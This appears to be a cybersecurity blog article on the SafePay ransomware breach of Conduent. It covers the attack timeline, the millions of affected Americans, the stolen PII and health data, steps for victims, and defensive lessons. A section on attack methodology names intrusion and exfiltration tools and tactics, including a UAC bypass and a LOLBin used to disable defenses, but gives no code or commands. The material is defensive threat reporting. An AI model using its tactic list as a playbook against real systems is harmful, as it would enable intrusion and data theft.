Conduent Ransomware Attack: SafePay Gang Exfiltrates 8.5TB of Data Impacting Over 10.5 Million Americans

The Breach That Shook Healthcare and Government Services Across 46 States

In what has become the largest healthcare data breach of 2025, business process outsourcing giant Conduent Business Solutions has confirmed that a sophisticated ransomware attack by the emerging SafePay cybercrime group compromised the sensitive personal and medical information of over 10.5 million individuals across the United States. The breach, which remained undetected for nearly three months, has exposed Social Security numbers, medical records, health insurance details, and other critical personal information of millions of Americans—including over 4 million residents in Texas alone.

Timeline of the Attack

The intrusion timeline reveals a disturbing pattern of prolonged unauthorized access:

• October 21, 2024: Initial breach occurs as attackers gain access to Conduent's network
• January 13, 2025: Service disruptions alert Conduent to the cybersecurity incident
• February 2025: SafePay ransomware group claims responsibility and threatens to publish 8.5 terabytes of stolen data
• April 2025: Conduent files formal disclosure with the U.S. Securities and Exchange Commission
• October 2025: Breach notifications begin reaching affected individuals across multiple states

The nearly three-month window of undetected access gave the threat actors ample time to conduct reconnaissance, exfiltrate massive amounts of data, and position themselves for maximum impact. By the time Conduent discovered the breach following service disruptions reported by state agencies including the Wisconsin Child Support Trust Fund, the damage was already extensive.

The Devastating Scope: Who Was Affected

Conduent's role as a critical third-party service provider to government agencies and healthcare organizations magnified the breach's impact across multiple sectors:

By the Numbers:

• 10.5+ million individuals affected nationwide
• Over 4 million victims in Texas—one of the largest state-level breaches in history
• 76,000 individuals in Washington State
• 462,000 Blue Cross Blue Shield of Montana members
• 310,000 UT Select and UT Care plan members in Texas
• Hundreds affected in Maine and Massachusetts

Impacted Organizations:

• Healthcare Providers: Humana, Premera Blue Cross, Blue Cross Blue Shield of Montana and Texas
• Government Services: Medicaid, CHIP (Children's Health Insurance Program), child support payment systems
• Federal Programs: Government payment disbursements for federally funded benefit and payment card programs

Conduent supports approximately 100 million U.S. residents across 46 states through various government health programs and operates many of the largest toll systems in the country. This wide-reaching service model meant that a single breach had cascading effects across healthcare, government operations, and critical infrastructure.

What Data Was Compromised

The types of information stolen represent a cybercriminal's treasure trove for identity theft, medical fraud, and financial crimes:

Personal Identifiable Information (PII):

• Full names and addresses
• Social Security numbers
• Dates of birth
• Contact information

Learn more about what constitutes PII and how to protect it with our interactive PII identification tool.

Protected Health Information (PHI):

• Medical treatment information
• Health insurance policy and ID numbers
• Medical history and claims data
• Health condition details

This combination of PII and PHI creates particularly dangerous scenarios for victims. Unlike credit card numbers that can be canceled and replaced, Social Security numbers and medical records are permanent aspects of a person's identity. The exposed data can be exploited for:

• Medical identity theft and fraudulent insurance claims
• Tax fraud and benefits theft using stolen SSNs
• Targeted phishing campaigns leveraging personal health information
• Creation of synthetic identities combining real and fake information
• Long-term financial fraud schemes

Meet SafePay: The Rising Threat

SafePay ransomware emerged in September-October 2024 and rapidly ascended to become one of the most active ransomware operations globally by May 2025. The group's involvement in the Conduent attack marked its first confirmed major strike against a U.S. technology firm and demonstrated the serious threat this relatively new player poses to critical infrastructure.

SafePay's Operational Profile:

Origins and Evolution: Security researchers have identified striking similarities between SafePay's code and leaked LockBit ransomware source code from late 2022. The group also incorporates tactics from other notorious operations including ALPHV/BlackCat and INC Ransom. Some analysts assess with moderate confidence that SafePay may represent a rebrand or evolution of established threat actors, which would explain their immediate high-volume operational tempo and sophisticated techniques.

Attack Methodology: SafePay follows a proven two-phase attack model:

1. Initial Access Phase:Understanding authentication vulnerabilities is critical. Explore biometric authentication risks and alternatives to strengthen your security posture.
   • Exploitation of exposed Remote Desktop Protocol (RDP) endpoints
   • Targeting of VPN vulnerabilities, particularly Fortigate SSL VPN implementations
   • Use of stolen credentials purchased from dark web markets or obtained through infostealer malware
   • Bypassing multi-factor authentication through misconfigured firewalls or weak password policies
2. Execution Phase:
   • Disabling security defenses using Living Off the Land Binaries (LOLBins) like SystemSettingsAdminFlows.exe
   • Conducting network reconnaissance with scripts like ShareFinder.ps1
   • Archiving data with WinRAR and 7-Zip
   • Exfiltrating files via FileZilla, Rclone, and RDP clipboard
   • Deploying ransomware and encryption within 24 hours of initial access

Technical Capabilities:

SafePay demonstrates sophisticated privilege escalation techniques, including a User Account Control (UAC) bypass method shared with LockBit and ALPHV/BlackCat operations. The malware:

• Checks for Cyrillic system languages to avoid infecting machines in Eastern European countries
• Terminates critical processes for databases, backups, and productivity applications
• Deletes shadow copies and tampers with boot configurations to prevent recovery
• Clears security logs and deploys anti-forensics scripts
• Uses AES and RSA encryption ciphers for file locking

The group maintains infrastructure on both the traditional Tor network and The Open Network (TON), providing redundant platforms for victim communication and data leaking. This dual-channel approach makes takedown efforts more difficult.

Double Extortion Tactics:

SafePay employs aggressive pressure tactics:

• Encrypts victim files while simultaneously stealing data
• Issues aggressive 72-hour initial deadlines
• Threatens to publish or sell stolen data if demands aren't met
• Maintains active leak sites showcasing victim organizations
• Has claimed over 200 victims since emergence

Security researchers note that SafePay achieves remarkable operational efficiency, consistently completing full network compromise and encryption within 24 hours of initial access—significantly faster than industry averages. This compressed timeline reduces detection and response opportunities while maximizing operational success rates.

The Aftermath: Response and Impact

Financial Costs:

Conduent reported $25 million in direct breach response costs as of May 2025, with final costs expected to climb substantially higher. These expenses include:

• Third-party forensic investigation (including engagement of Palo Alto Networks)
• Legal fees and regulatory compliance
• Credit monitoring services (though not offered to all victims)
• System restoration and security enhancements
• Notification costs across multiple states

Operational Disruption:

The attack caused immediate service outages affecting:

• Electronic money transfers
• EBT (Electronic Benefit Transfer) payment systems
• Child support payment processing
• Medicaid and CHIP service delivery
• Government payment disbursements

While Conduent stated it restored most systems within days—and in some cases, hours—the disruption left vulnerable populations without access to critical benefits and payments during the initial response period.

Regulatory Response:

Conduent filed breach notifications with:

• U.S. Securities and Exchange Commission (SEC)
• Attorney General offices in Texas, Oregon, California, Montana, Maine, Massachusetts, Washington, and New Hampshire
• State regulators across 46 states
• Law enforcement agencies

Organizations facing similar incidents should understand their data breach notification obligations across different jurisdictions.

The Department of Health and Human Services' Office for Civil Rights should have been notified, but the breach is not yet listed on the OCR breach portal due to the government shutdown that began in late September 2025.

The HIPAA Journal has ranked the Conduent data breach as the eighth largest healthcare data breach of all time and the largest of 2025.

The Third-Party Risk Problem

The Conduent breach exemplifies a growing trend in cybersecurity: third-party vendors and business associates have become prime targets for ransomware groups because they serve as single points of failure affecting multiple organizations simultaneously.

Conduent provides critical back-office services including:

• Third-party printing and mailroom services
• Document processing
• Payment integrity services
• Claims processing
• Benefits administration

When such a vendor is compromised, the blast radius extends far beyond a single organization. In this case:

• Multiple healthcare insurers were affected despite their own systems remaining secure
• Government agencies across dozens of states experienced service disruptions
• Millions of beneficiaries had no relationship with Conduent but had their data exposed through their healthcare providers and government programs

This attack underscores the critical importance of:

• Vendor risk management programs that continuously assess third-party security postures
• Contractual security requirements including incident response obligations
• Regular security audits of business associate relationships
• Data minimization practices to limit what information is shared with vendors
• Segmentation to prevent vendor access from becoming a pathway to crown jewel systems

In today's interconnected ecosystem, understanding digital twin risks in healthcare and supply chains is essential for comprehensive third-party risk management.

What Victims Should Do Now

If you receive a breach notification from Conduent or any of the affected healthcare organizations and government agencies:

Immediate Actions:

1. Monitor Financial Accounts: Review bank statements, credit card activity, and insurance claims for unauthorized transactions
2. Check Credit Reports: Obtain free credit reports from all three major bureaus (Equifax, Experian, TransUnion) at AnnualCreditReport.com
3. Consider a Credit Freeze: Place a security freeze on your credit files to prevent new accounts from being opened in your name. Contact:
   • Equifax: 1-800-349-9960
   • Experian: 1-888-397-3742
   • TransUnion: 1-888-909-8872
4. Set Up Fraud Alerts: Place a fraud alert on your credit reports, requiring creditors to verify your identity before extending credit
5. Monitor Medical Records: Request copies of your medical records to check for fraudulent treatments or prescriptions
6. Watch for Phishing: Be alert to emails, texts, or calls claiming to be from Conduent, your health insurer, or government agencies. Scammers exploit breach notifications to conduct targeted phishing campaigns

Long-Term Protection:

• File Taxes Early: File your tax return as early as possible to prevent fraudsters from filing fake returns using your SSN
• Monitor Government Benefits: Regularly verify that your Social Security, Medicare, and Medicaid accounts show no suspicious activity
• Use Identity Monitoring Services: Consider enrolling in identity theft protection services that monitor the dark web for your personal information
• Document Everything: Keep records of all breach notifications, correspondence, and any suspicious activity
• Know Your Rights: Understand your privacy rights under various state and federal regulations including HIPAA, state breach notification laws, and consumer protection statutes

Contact Information:

Conduent has established a dedicated assistance line for affected individuals:

• Phone: 855-291-2608
• Hours: Monday through Friday, 9:00 AM to 9:00 PM Eastern Time

The Bigger Picture: Lessons for Organizations

The Conduent breach offers critical lessons for organizations across all sectors:

1. Detection Time Matters

The nearly three-month dwell time allowed attackers to conduct thorough reconnaissance and exfiltrate 8.5 terabytes of data. Organizations must:

• Implement robust Security Information and Event Management (SIEM) solutions
• Deploy Endpoint Detection and Response (EDR) tools across all systems
• Establish 24/7 Security Operations Center (SOC) monitoring
• Conduct regular threat hunting exercises

2. RDP and VPN Remain Critical Vulnerabilities

SafePay's preferred attack vector exploits exposed RDP endpoints and VPN vulnerabilities. Organizations should:

• Implement multi-factor authentication on all remote access systems
• Patch VPN appliances and RDP gateways immediately when updates are available
• Use network segmentation to limit lateral movement
• Monitor and log all remote access activity
• Consider Zero Trust Network Access (ZTNA) solutions

Assess your organization's device security posture and remote access risks to identify potential attack vectors.

3. The 24-Hour Encryption Window

SafePay's ability to achieve full network encryption within 24 hours of access demands:

• Incident response plans that can activate within hours, not days
• Offline, immutable backups tested regularly
• Network segmentation to slow lateral movement
• Privileged access management to limit credential abuse

4. Third-Party Risk Is Enterprise Risk

Organizations must treat vendor security as an extension of their own security programs:

• Conduct thorough security assessments before contracting with vendors
• Require contractual security standards and audit rights
• Monitor vendor security posture continuously
• Maintain incident response coordination with critical vendors
• Implement data flow mapping to understand third-party data exposure

5. Ransomware Is About Data Theft, Not Just Encryption

Modern ransomware operations like SafePay focus on data exfiltration and extortion, making encryption secondary. This shift requires:

• Data loss prevention (DLP) tools to detect large file transfers
• Network traffic analysis to identify exfiltration patterns
• Data classification programs to understand what's at risk
• Encryption of sensitive data at rest

The Evolution of Ransomware Economics

SafePay's emergence and rapid success illustrate the evolving ransomware ecosystem. The group reportedly operates as an independent ransomware operation rather than a Ransomware-as-a-Service (RaaS) model, maintaining centralized control over operations, infrastructure, and negotiations.

This operational model suggests:

• Experienced operators: The sophistication and volume of attacks indicate involvement of skilled threat actors, possibly veterans from previous operations
• Financial motivation: Primary targeting of financial, legal, and insurance sectors (hence the name "SafePay") shows strategic victim selection
• Expanding scope: Recent shift to targeting healthcare and critical infrastructure indicates either growing ambition or declining availability of original target categories

The group's claimed theft of 8.5 terabytes from Conduent represents one of the largest documented data exfiltration events in ransomware history, demonstrating both technical capability and patience to extract such massive datasets without detection.

Looking Forward: The Ransomware Landscape in 2025

The Conduent incident is part of a broader pattern. After law enforcement disruptions of major operations like LockBit and ALPHV in 2023-2024, the ransomware ecosystem has fragmented. New groups like SafePay are competing to fill the void, often recruiting experienced affiliates and operators from defunct operations.

Key trends to watch:

Consolidation of targeting: Groups increasingly focus on high-value targets like healthcare, government contractors, and critical infrastructure where downtime and data exposure create maximum pressure to pay

Sophistication increase: New groups are launching with mature capabilities, suggesting experienced operators rebranding or collaborating

Third-party exploitation: Vendors and business associates continue to be lucrative targets due to their access to multiple organizations' data

Speed of operations: The 24-hour encryption timeline is becoming standard, reducing detection and response windows

Geopolitical dimensions: The presence of CIS (Commonwealth of Independent States) language killswitches in SafePay malware suggests potential Eastern European or Russian origins, raising questions about state tolerance or sponsorship

Conclusion: A Wake-Up Call for Critical Infrastructure

The Conduent ransomware attack serves as a stark reminder that cybersecurity failures at third-party vendors can have catastrophic ripple effects across entire sectors of the economy. When a single breach exposes the personal and medical information of over 10.5 million Americans—including 4 million Texans—the incident transcends typical corporate data breach discussions and becomes a matter of national security and public health.

SafePay's emergence as a major threat actor, combined with their ability to remain undetected for nearly three months while exfiltrating 8.5 terabytes of sensitive data, demonstrates that the ransomware threat continues to evolve and intensify. Organizations must adapt their security strategies accordingly.

For affected individuals, vigilance is paramount. With Social Security numbers and medical records in criminal hands, the risk of identity theft and fraud will persist for years. Regular monitoring, credit freezes, and awareness of phishing attempts targeting breach victims should become routine practices.

For organizations—especially those handling sensitive personal information or serving as critical vendors—the message is clear: robust cybersecurity is no longer optional. The stakes are too high, the attackers too sophisticated, and the consequences too severe. The question is no longer if your organization will face a sophisticated attack, but when—and whether you'll be prepared to detect and respond before months of unauthorized access turn into millions of exposed records.

About This Breach: Information in this article is compiled from official breach notifications filed with state attorney general offices, SEC filings, and security research from leading cybersecurity firms including Huntress, Palo Alto Networks, SOCRadar, Check Point, and others. Figures represent confirmed impacts as of October 2025, with final totals potentially higher as additional notifications are filed.

Stay Informed: For the latest updates on this breach and other cybersecurity threats, bookmark our blog and follow our coverage of emerging ransomware groups and data breach incidents affecting Americans' personal information.